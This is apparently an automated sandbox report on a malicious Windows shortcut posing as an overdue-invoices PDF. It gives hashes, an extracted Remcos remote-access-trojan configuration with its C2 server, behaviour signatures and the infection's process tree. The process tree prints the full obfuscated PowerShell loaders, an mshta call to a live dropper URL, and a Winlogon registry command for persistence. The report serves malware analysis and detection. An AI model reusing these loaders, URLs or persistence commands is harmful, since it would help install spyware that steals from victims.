Analysis

  • max time kernel
    150s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags
    arch:x64,  arch:x86,  image:win10v2004-20220812-en,  locale:en-us,  os:windows10-2004-x64,  system
  • submitted
    17-08-2022 07:11

General

  • Target

    FACTURAS VENCIDAS.pdf.lnk

  • Size

    4KB

  • Sample

    220817-hzyceaccbr

  • MD5

    321240e769016fa53af40cb6ab98cc0d

  • SHA1

    44b6143d5ec750d11f38d311622ef849b8ec5178

  • SHA256

    517b9d73ba6d6fd29ef0e008a01b11487c9217e466e17bb073a05412b3932e5b

  • SHA512

    b8189176905d269d0135267ac47ac30f140ab76cb8ae5025250691f99f6b8ae186d05bad3bee3521726d6dc4f14f25cca3235aebcd9a9f56c8b8e93eb52e86dd

Malware Config

Extracted

Language hta
Source
URLs
hta.dropper

https://movilidadvialcolombia.com/envios.hta

Extracted

Family

remcos

Botnet

ENVIOJAGOSTO 16

C2

logisitica.discisoted.info:5505

Attributes
audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
true
keylog_file
logs.dat
keylog_flag
false
keylog_folder
fryuias
mouse_option
false
mutex
yyuhajsstr-SGRMTP
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
startup_value
Remcos
take_screenshot_option
false
take_screenshot_time
5

Signatures 12

  • Modifies WinLogon for persistence ⋅ 2 TTPs 1 IoCs
  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Blocklisted process makes network request ⋅ 4 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE ⋅ 4 IoCs
  • Checks computer location settings ⋅ 2 TTPs 5 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Suspicious use of SetThreadContext ⋅ 1 IoCs
  • Enumerates physical storage devices ⋅ 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses ⋅ 47 IoCs
  • Suspicious use of AdjustPrivilegeToken ⋅ 6 IoCs
  • Suspicious use of SetWindowsHookEx ⋅ 1 IoCs
  • Suspicious use of WriteProcessMemory ⋅ 64 IoCs

Processes 14

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\FACTURAS VENCIDAS.pdf.lnk"
    Checks computer location settings
    Suspicious use of WriteProcessMemory
    PID:2176
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted $RmOQa='oaaviioo.ai:loavstm.nl/daoMcbHhemdihvpTlmttslsc//i'; &(-join($RmOQa[(25567-25551),(-5690+5691),(-53183+53195)])) :\ (-join($RmOQa[(25567-25551),(-5690+5691),(-53183+53195)])); :\ ^* (-join($RmOQa[(-49742+49760),(25567-25551),(-65481+65510),(-31827+31844),(-5690+5691)])); foreach($bxcdxk in @((-7238+7268),(15062-15045),(12459-12442),(60614-60577),(-27262+27278),(-16356+16367),(-59583+59605),(-38422+38444),(4418-4400),(-45458+45458),(-8330+8333),(53548-53544),(31137-31125),(-32813+32817),(10370-10347),(2734-2733),(32919-32896),(-55404+55407),(25253-25249),(-60232+60233),(-22204+22216),(-3617+3644),(-25191+25191),(16991-16979),(-56149+56149),(-64411+64429),(-33829+33857),(25970-25966),(-29913+29914),(28759-28751),(-21336+21363),(29847-29847),(16247-16229),(-50154+50176),(-35833+35864),(-60816+60836),(54974-54971),(-1453+1457),(21056-21056),(30922-30906),(25154-25146),(39267-39237),(54694-54677),(-5241+5242))) {$nxFNKh+= $RmOQa[$bxcdxk]}; ^* $nxFNKh;
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:4388
      • C:\Windows\system32\mshta.exe
        "C:\Windows\system32\mshta.exe" https://movilidadvialcolombia.com/envios.hta
        Blocklisted process makes network request
        Checks computer location settings
        Suspicious use of WriteProcessMemory
        PID:5076
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function QFoo($wTJMjo, $MhKJTz){[IO.File]::WriteAllBytes($wTJMjo, $MhKJTz)};function oWVxzCgn($wTJMjo){if($wTJMjo.EndsWith((TKBlbKosjn @(40128,40182,40190,40190))) -eq $True){rundll32.exe $wTJMjo }elseif($wTJMjo.EndsWith((TKBlbKosjn @(40128,40194,40197,40131))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $wTJMjo}else{Start-Process $wTJMjo}};function TEoNadtoqIADiJtREz($QFoo){$ePgOrIoohIZip=(TKBlbKosjn @(40154,40187,40182,40182,40183,40192));$NvFKRrCmYzte=(Get-ChildItem $QFoo -Force);$NvFKRrCmYzte.Attributes=$NvFKRrCmYzte.Attributes -bor ([IO.FileAttributes]$ePgOrIoohIZip).value__};function LRhURdeLXaoFREK($RhhiytOYBUlRYkYz){$UxWyBRTErTofGy = New-Object (TKBlbKosjn @(40160,40183,40198,40128,40169,40183,40180,40149,40190,40187,40183,40192,40198));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$MhKJTz = $UxWyBRTErTofGy.DownloadData($RhhiytOYBUlRYkYz);return $MhKJTz};function TKBlbKosjn($OtwbKcGJk){$twsgAgLF=40082;$ayaUHuGIzOdqfFj=$Null;foreach($SDGrVxav in $OtwbKcGJk){$ayaUHuGIzOdqfFj+=[char]($SDGrVxav-$twsgAgLF)};return $ayaUHuGIzOdqfFj};function sKNdBIlT(){$XfNNgfeGyqSKOd = $env:AppData + '\';$xLoEtvLekWTSlcQ = $XfNNgfeGyqSKOd + 'RE3ByzZ?ver=f85f&q=90&m=2&h=768&w=1024&b=%23FFFFFFFF&aim=true';If(Test-Path -Path $xLoEtvLekWTSlcQ){Invoke-Item $xLoEtvLekWTSlcQ;}Else{ $FNdxUMhlTwTXIn = LRhURdeLXaoFREK (TKBlbKosjn @(40186,40198,40198,40194,40197,40140,40129,40129,40187,40191,40185,40127,40194,40196,40193,40182,40127,40181,40191,40197,40127,40196,40198,40127,40191,40187,40181,40196,40193,40197,40193,40184,40198,40127,40181,40193,40191,40128,40179,40189,40179,40191,40179,40187,40204,40183,40182,40128,40192,40183,40198,40129,40181,40191,40197,40129,40179,40194,40187,40129,40179,40191,40129,40187,40191,40179,40185,40183,40152,40187,40190,40183,40150,40179,40198,40179,40129,40164,40151,40133,40148,40203,40204,40172,40145,40200,40183,40196,40143,40184,40138,40135,40184,40120,40195,40143,40139,40130,40120,40191,40143,40132,40120,40186,40143,40137,40136,40138,40120,40201,40143,40131,40130,40132,40134,40120,40180,40143,40119,40132,40133,40152,40152,40152,40152,40152,40152,40152,40152,40120,40179,40187,40191,40143,40198,40196,40199,40183));QFoo $xLoEtvLekWTSlcQ $FNdxUMhlTwTXIn;Invoke-Item $xLoEtvLekWTSlcQ;};$Cguc = $XfNNgfeGyqSKOd + 'envioa16.exe'; if (Test-Path -Path $Cguc){oWVxzCgn $Cguc;}Else{ $JkgHoE = LRhURdeLXaoFREK (TKBlbKosjn @(40186,40198,40198,40194,40197,40140,40129,40129,40191,40193,40200,40187,40190,40187,40182,40179,40182,40200,40187,40179,40190,40181,40193,40190,40193,40191,40180,40187,40179,40128,40181,40193,40191,40129,40183,40192,40200,40187,40193,40179,40131,40136,40128,40183,40202,40183));QFoo $Cguc $JkgHoE;oWVxzCgn $Cguc;};TEoNadtoqIADiJtREz $Cguc;;;;;}sKNdBIlT;
          Blocklisted process makes network request
          Suspicious behavior: EnumeratesProcesses
          Suspicious use of AdjustPrivilegeToken
          Suspicious use of WriteProcessMemory
          PID:4548
          • C:\Users\Admin\AppData\Roaming\envioa16.exe
            "C:\Users\Admin\AppData\Roaming\envioa16.exe"
            Executes dropped EXE
            Checks computer location settings
            Suspicious behavior: EnumeratesProcesses
            Suspicious use of AdjustPrivilegeToken
            Suspicious use of WriteProcessMemory
            PID:416
            • C:\Windows\SysWOW64\cmd.exe
              "cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\AppData\Roaming\edge.exe,"
              Suspicious use of WriteProcessMemory
              PID:2608
              • C:\Windows\SysWOW64\reg.exe
                REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\AppData\Roaming\edge.exe,"
                Modifies WinLogon for persistence
                PID:1072
            • C:\Users\Admin\AppData\Roaming\edge.exe
              "C:\Users\Admin\AppData\Roaming\edge.exe"
              Executes dropped EXE
              Checks computer location settings
              Suspicious use of SetThreadContext
              Suspicious behavior: EnumeratesProcesses
              Suspicious use of AdjustPrivilegeToken
              Suspicious use of WriteProcessMemory
              PID:3764
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                PID:4528
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                PID:4788
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                PID:4356
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                Suspicious use of SetWindowsHookEx
                PID:544
              • C:\Users\Admin\AppData\Local\Temp\process.exe
                "C:\Users\Admin\AppData\Local\Temp\process.exe"
                Executes dropped EXE
                Checks computer location settings
                Suspicious behavior: EnumeratesProcesses
                Suspicious use of AdjustPrivilegeToken
                PID:2200
                • C:\Users\Admin\AppData\Local\Temp\process.exe
                  "C:\Users\Admin\AppData\Local\Temp\process.exe"
                  Executes dropped EXE
                  Suspicious behavior: EnumeratesProcesses
                  Suspicious use of AdjustPrivilegeToken
                  PID:2952

Network

MITRE ATT&CK Matrix

Collection

    Command and Control

      Credential Access

        Defense Evasion

        Execution

          Exfiltration

            Impact

              Initial Access

                Lateral Movement

                  Persistence

                  Privilege Escalation

                    Replay Monitor

                    00:00 00:00

                    Downloads

                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                      MD5

                      2f57fde6b33e89a63cf0dfdd6e60a351

                      SHA1

                      445bf1b07223a04f8a159581a3d37d630273010f

                      SHA256

                      3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

                      SHA512

                      42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\process.exe.log
                      MD5

                      7dca233df92b3884663fa5a40db8d49c

                      SHA1

                      208b8f27b708c4e06ac37f974471cc7b29c29b60

                      SHA256

                      90c83311e35da0b5f8aa65aa2109745feb68ee9540e863f4ed909872e9c6a84c

                      SHA512

                      d134b96fd33c79c85407608f76afc5a9f937bff453b1c90727a3ed992006c7d4c8329be6a2b5ba6b11da1a32f7cd60e9bc380be388b586d6cd5c2e6b1f57bd07

                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                      MD5

                      93cb4762051c76ef612cb1d1d3d2239b

                      SHA1

                      422e15da3533916c8c202f10419ae256d3294b98

                      SHA256

                      2a71d735c4783ea63445e7a9edbed8d284dd0127a97419e7274aac2c14bfe6c1

                      SHA512

                      dd125954450fcd5eb4804852478b8d2356c60ad03441996aff0163b293fe5f40d3cf5c3130690896c0cf12d7f48c3d36a0bbed5a996413d4672a706a83852b34

                    • C:\Users\Admin\AppData\Local\Temp\process.exe
                      MD5

                      0e362e7005823d0bec3719b902ed6d62

                      SHA1

                      590d860b909804349e0cdc2f1662b37bd62f7463

                      SHA256

                      2d0dc6216f613ac7551a7e70a798c22aee8eb9819428b1357e2b8c73bef905ad

                      SHA512

                      518991b68496b3f8545e418cf9b345e0791e09cc20d177b8aa47e0aba447aa55383c64f5bdaca39f2b061a5d08c16f2ad484af8a9f238ca23ab081618fba3ad3

                    • C:\Users\Admin\AppData\Local\Temp\process.exe
                      MD5

                      0e362e7005823d0bec3719b902ed6d62

                      SHA1

                      590d860b909804349e0cdc2f1662b37bd62f7463

                      SHA256

                      2d0dc6216f613ac7551a7e70a798c22aee8eb9819428b1357e2b8c73bef905ad

                      SHA512

                      518991b68496b3f8545e418cf9b345e0791e09cc20d177b8aa47e0aba447aa55383c64f5bdaca39f2b061a5d08c16f2ad484af8a9f238ca23ab081618fba3ad3

                    • C:\Users\Admin\AppData\Local\Temp\process.exe
                      MD5

                      0e362e7005823d0bec3719b902ed6d62

                      SHA1

                      590d860b909804349e0cdc2f1662b37bd62f7463

                      SHA256

                      2d0dc6216f613ac7551a7e70a798c22aee8eb9819428b1357e2b8c73bef905ad

                      SHA512

                      518991b68496b3f8545e418cf9b345e0791e09cc20d177b8aa47e0aba447aa55383c64f5bdaca39f2b061a5d08c16f2ad484af8a9f238ca23ab081618fba3ad3

                    • C:\Users\Admin\AppData\Local\Temp\process.txt
                      MD5

                      97698d1d1a7cd4322000042f83794351

                      SHA1

                      37f69ed5392d6f4bf503f83b2752e40a97d35f14

                      SHA256

                      606e02e6e908a5cfcc58233073528509297238fc071212d01a0b05935851b12c

                      SHA512

                      9415d7227431231c6a400f857c2e873562da761e2413d2b155537d1d2cf5752c1c885bd3a406c8adbf6cc43014896015bc6b458371a474d15dd2c9a77442560f

                    • C:\Users\Admin\AppData\Local\Temp\process.txt
                      MD5

                      0db3c08c67e1da482a0aade89f0df811

                      SHA1

                      d3b3426f1740361b0935438e7879f3bfdaff5bf1

                      SHA256

                      fd7e17eaca703972ae537099ae7571014c61d94083151398ae2b966a99b5f932

                      SHA512

                      195b0f965f94ca80d8541a3939c1bbfd37f280308a13e97691c2863939244e1686924b3696542a401401a3e9d855c065f33e7631a55fce0b6c64e4805d9d8019

                    • C:\Users\Admin\AppData\Local\Temp\process.txt
                      MD5

                      0db3c08c67e1da482a0aade89f0df811

                      SHA1

                      d3b3426f1740361b0935438e7879f3bfdaff5bf1

                      SHA256

                      fd7e17eaca703972ae537099ae7571014c61d94083151398ae2b966a99b5f932

                      SHA512

                      195b0f965f94ca80d8541a3939c1bbfd37f280308a13e97691c2863939244e1686924b3696542a401401a3e9d855c065f33e7631a55fce0b6c64e4805d9d8019

                    • C:\Users\Admin\AppData\Roaming\edge.exe
                      MD5

                      3f146204fb84a87777b40595b188b6bb

                      SHA1

                      b9d03c4eed64760a4bfc10b5112bdf47f2c6fb07

                      SHA256

                      d851906c3ef55826aa9f3ef0b30df65a77161fa710067d6f2c5479fe7f60e269

                      SHA512

                      1c2f7af172e814b82d1712eb5313c2cda1d7d92ee59fb70793c94697f8f29686182d3f87d0bc1a66e25912316c4ea936620cdd0f429fadd0c2a661421f55d9b5

                    • C:\Users\Admin\AppData\Roaming\edge.exe
                      MD5

                      3f146204fb84a87777b40595b188b6bb

                      SHA1

                      b9d03c4eed64760a4bfc10b5112bdf47f2c6fb07

                      SHA256

                      d851906c3ef55826aa9f3ef0b30df65a77161fa710067d6f2c5479fe7f60e269

                      SHA512

                      1c2f7af172e814b82d1712eb5313c2cda1d7d92ee59fb70793c94697f8f29686182d3f87d0bc1a66e25912316c4ea936620cdd0f429fadd0c2a661421f55d9b5

                    • C:\Users\Admin\AppData\Roaming\envioa16.exe
                      MD5

                      3f146204fb84a87777b40595b188b6bb

                      SHA1

                      b9d03c4eed64760a4bfc10b5112bdf47f2c6fb07

                      SHA256

                      d851906c3ef55826aa9f3ef0b30df65a77161fa710067d6f2c5479fe7f60e269

                      SHA512

                      1c2f7af172e814b82d1712eb5313c2cda1d7d92ee59fb70793c94697f8f29686182d3f87d0bc1a66e25912316c4ea936620cdd0f429fadd0c2a661421f55d9b5

                    • C:\Users\Admin\AppData\Roaming\envioa16.exe
                      MD5

                      3f146204fb84a87777b40595b188b6bb

                      SHA1

                      b9d03c4eed64760a4bfc10b5112bdf47f2c6fb07

                      SHA256

                      d851906c3ef55826aa9f3ef0b30df65a77161fa710067d6f2c5479fe7f60e269

                      SHA512

                      1c2f7af172e814b82d1712eb5313c2cda1d7d92ee59fb70793c94697f8f29686182d3f87d0bc1a66e25912316c4ea936620cdd0f429fadd0c2a661421f55d9b5

                    • memory/416-146-0x0000000000E30000-0x0000000000F2A000-memory.dmp
                    • memory/416-147-0x00000000057B0000-0x000000000584C000-memory.dmp
                    • memory/416-148-0x0000000016F50000-0x00000000174F4000-memory.dmp
                    • memory/416-149-0x0000000006750000-0x00000000067E2000-memory.dmp
                    • memory/416-150-0x0000000006720000-0x000000000672A000-memory.dmp
                    • memory/416-151-0x0000000019200000-0x0000000019266000-memory.dmp
                    • memory/416-152-0x00000000196D0000-0x0000000019892000-memory.dmp
                    • memory/416-153-0x0000000019DD0000-0x000000001A2FC000-memory.dmp
                    • memory/416-154-0x0000000019A60000-0x0000000019A82000-memory.dmp
                    • memory/416-142-0x0000000000000000-mapping.dmp
                    • memory/544-166-0x0000000000400000-0x000000000047B000-memory.dmp
                    • memory/544-164-0x0000000000000000-mapping.dmp
                    • memory/544-179-0x0000000000400000-0x000000000047B000-memory.dmp
                    • memory/544-168-0x0000000000400000-0x000000000047B000-memory.dmp
                    • memory/544-167-0x0000000000400000-0x000000000047B000-memory.dmp
                    • memory/544-165-0x0000000000400000-0x000000000047B000-memory.dmp
                    • memory/1072-156-0x0000000000000000-mapping.dmp
                    • memory/2200-172-0x0000000000DC0000-0x0000000000DDA000-memory.dmp
                    • memory/2200-169-0x0000000000000000-mapping.dmp
                    • memory/2608-155-0x0000000000000000-mapping.dmp
                    • memory/2952-174-0x0000000000000000-mapping.dmp
                    • memory/3764-157-0x0000000000000000-mapping.dmp
                    • memory/3764-160-0x00000000002B0000-0x00000000003AA000-memory.dmp
                    • memory/4356-163-0x0000000000000000-mapping.dmp
                    • memory/4388-136-0x00007FFF3CA10000-0x00007FFF3D4D1000-memory.dmp
                    • memory/4388-132-0x0000000000000000-mapping.dmp
                    • memory/4388-134-0x00007FFF3CA10000-0x00007FFF3D4D1000-memory.dmp
                    • memory/4388-133-0x00000297D1600000-0x00000297D1622000-memory.dmp
                    • memory/4528-161-0x0000000000000000-mapping.dmp
                    • memory/4548-145-0x00007FFF3C200000-0x00007FFF3CCC1000-memory.dmp
                    • memory/4548-141-0x00007FFF3C200000-0x00007FFF3CCC1000-memory.dmp
                    • memory/4548-138-0x0000000000000000-mapping.dmp
                    • memory/4788-162-0x0000000000000000-mapping.dmp
                    • memory/5076-135-0x0000000000000000-mapping.dmp